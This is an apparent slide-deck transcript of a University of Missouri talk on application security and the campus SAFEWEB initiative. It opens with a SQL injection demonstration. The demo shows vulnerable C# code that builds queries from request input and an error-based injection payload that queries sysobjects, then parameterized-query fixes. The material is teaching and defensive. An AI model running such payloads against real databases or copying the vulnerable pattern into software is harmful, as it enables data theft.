application security at mu allen brokken (gsec,cpts) principal systems security analyst
TRANSCRIPT
Application Security at MU
Allen Brokken (GSEC,CPTS)Principal Systems Security
Analyst
DemonstrationSQL Injection /
Blind SQL Injection
SQL Injection – Vulnerable Code
Vulnerable code
URL
sSql = sSql + " where LocationID = " + Request["cboLocation"] + "";sSql = sSql + " where LocationID = " + Request["cboLocation"] + "";oCmd.CommandText = sSql;oCmd.CommandText = sSql;
SQL Injection – Vulnerable Code
Debug View? oCmd.CommandText? oCmd.CommandText"SELECT EventName, EndDate, [Description], [Location], ……. "SELECT EventName, EndDate, [Description], [Location], ……. from Events from Events where LocationID = convert(int,(select top 1 name from sysobjects))"where LocationID = convert(int,(select top 1 name from sysobjects))"
SQL Remediation
Do not build SQL Statements with user provided data in the commandParameterized queriesMimimum necessary rights on application userDisable error messages
SQL Injection – Safe Code
Simple but safe code
URL
sSql = sSql + " where LocationID = @LocationID";sSql = sSql + " where LocationID = @LocationID";oCmd.CommandText = sSql;oCmd.CommandText = sSql;oCmd.Parameters.Add("@LocationID", Request["cboLocation"]);oCmd.Parameters.Add("@LocationID", Request["cboLocation"]);
SQL Injection – Safe Code
Debug view? oCmd.CommandText? oCmd.CommandTextSELECT EventName,[Description], [Location] from Events SELECT EventName,[Description], [Location] from Events where LocationID = @LocationIDwhere LocationID = @LocationID
Java Prepared Statement
http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.html
PreparedStatement updateSales = con.prepareStatement( "UPDATE COFFEES SET SALES = ? WHERE COF_NAME LIKE ? ");
updateSales.setInt(1, 75); updateSales.setString(2, "Colombian"); updateSales.executeUpdate();
University of Missouri - Columbia
Flagship campus in a four campus public University system15000+ employeesOutreach and Extension programs (state-wide) Approximately 27,000 students ■ ~20,500 undergraduates■ ~6500 graduate/professional
Approximately 6000 students live in University housing■ Most have high speed internet access (ResNet)
University of Missouri - Columbia
Information Access & Technology Services (IATS) is the central IT group■ Voice/Cable TV/Wired & Wireless Network■ Central storage■ Help desk ■ Computing Sites■ Application Development■ Account Management■ Security
University of Missouri - Columbia
Application Development Environment■ Central Application Development Group
.Net centric Organized around standard process
■ Distributed Application DevelopmentMultiple development “shops”Lone Jack of all Trades development
■ 3rd Party Applications
Traditional Security Concept
Security subject matter expertLargely bolted on after the factIncredibly slow process
Traditional Security Concept
Issues with the traditional concept■ The Security Professional becomes a
bottle neck■ The process builds adversarial
relationships within the organization■ The process has a high long term cost
in productivity and tends to actually reduce security
The New Security Concept
Whole campus focusMore StaffDeveloper EducationBetter ToolsCampus Policy
The New Security Concept
The SAFEWEB Campaign Objectives■ Applications development standards with an
emphasis on security. ■ Data classification policies. ■ Secure server environments that support
the defined data classifications. ■ Auditing policies and processes to insure
adherence to the standards. ■ Minimum training requirements for
applications development, database administration and server administration.
Administrative Effect
Buy-in from Provost Staff, Counsel of DeansCampus developer education opportunities to gain supportIAT Services process changes
Administrative Effect
Vastly increased turn around timeBetter code, with fewer vulnerabilitiesBetter communication with campus developersStandardized code for key functions
Research Effect
Research Systems Inspections■ I3■ “Departmental Back-Up Web Server”
Researcher awarenessGraduate student benefits
Classroom Effect
Faculty CollaborationGuest Lecture SeriesClassroom Software Pilot
Classroom Effect
Guest Lecture Series■ General Security Awareness■ Digital Millennium Copyright Act■ Web Application Security Basics■ Payment Card Industry Data Security
Standard■ Information Security Auditing and
Tools
Classroom Effect“In the auditing environment today technology plays a very large part in what we will be doing. After this presentation I was given insight into various tools that companies I might be auditing could be implementing.”Anonymous Student – Information Assurance“[the]…presentation really does help to validate our course content. Students seem to better appreciate the value of controls when someone who actually deals with them on a daily basis emphasizes their importance.”Dr. Elaine Mauldin – Professor Information Assurance
Classroom Effect
Classroom Effect
Classroom Effect
Classroom Effect
Classroom Effect
Classroom Effect
Report Details■ Severity■ File Name(s)■ Summary■ Execution■ Implication■ Fix■ References
Classroom Effect
Management Console Look at Student LearningManagement Console Look at Student Learning
Classroom Effect
Classroom EffectI would use this tool outside of this class to ensure the security of my code if it were generally available:
Mostly Agree / Mostly AgreeI would recommend the use of this tool to others if it were generally available:
Mostly agree / Mostly agreeI learned something from the use of this software:
Mostly agree / Totally AgreeI appreciated the inclusion of security related topics in this course:
Totally Agree / Totally AgreeI am more concerned about the security of my code now than I was before using the software:
Totally agree / Totally Agree
Classroom Effect
“… I truly believe that my students learned more about web security by using this software in the Web App II class. … I think Computer Science and SISLT should consider using this system in the future.”Chris Amelung – Course Instructor Web Application Development II
Q&A
SafeWeb Initiative■ http://safeweb.missouri.edu
Application Security Software■ http://www.spidynamics.com
Presenter Contact■ [email protected]